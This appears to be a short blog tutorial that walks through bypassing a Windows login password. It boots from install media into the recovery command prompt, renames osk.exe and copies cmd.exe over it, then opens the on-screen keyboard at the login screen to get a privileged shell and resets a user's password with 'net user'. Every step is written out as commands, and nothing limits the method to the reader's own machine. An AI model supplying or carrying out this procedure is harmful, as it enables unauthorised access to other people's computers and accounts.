
We need bootable cd/dvd of windows which you want to bypass.
To know how to create bootable device click here .
Insert window and restart ur pc.
Then,press any key to start.
Then go for repair your windows.
After this we have to go to troubleshooting,then cmd prompt.
In cmd prompt:-
enter c:
c:\>dir
to check window is install in this partition.
if not this
then try to go another drive like
c:\>d:
D:\>dir
After find that partition where our windows installed.
Enter in windows
C:\>cd windows
c:\windows>cd System32
Then find a file name osk.exe and take backup of that file
c:\windows\System32>ren osk.exe osk.exe_bck
Then we copy cmd prompt into osk.exe
c:\windows\System32>copy cmd.exe osk.exe
c:\windows\System32>exit
And restart your computer
Find on screen keyboard and open that it will be opened cmd prompt
Now, we can access all command through this cmd prompt.
c:\windows\System32>net user <name of user> *
Change password:
Retype password:
Your password changed!!!
Comments
Post a Comment